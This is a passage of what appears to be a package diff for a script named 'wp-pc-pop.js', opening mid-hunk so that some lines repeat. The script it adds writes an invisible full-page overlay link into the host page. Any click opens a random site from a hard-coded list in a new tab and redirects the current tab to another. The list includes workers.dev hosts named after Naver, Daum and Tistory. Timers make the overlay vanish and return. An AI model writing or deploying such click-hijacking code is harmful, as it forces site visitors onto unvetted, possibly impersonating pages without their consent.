+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/wp-pc-pop.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }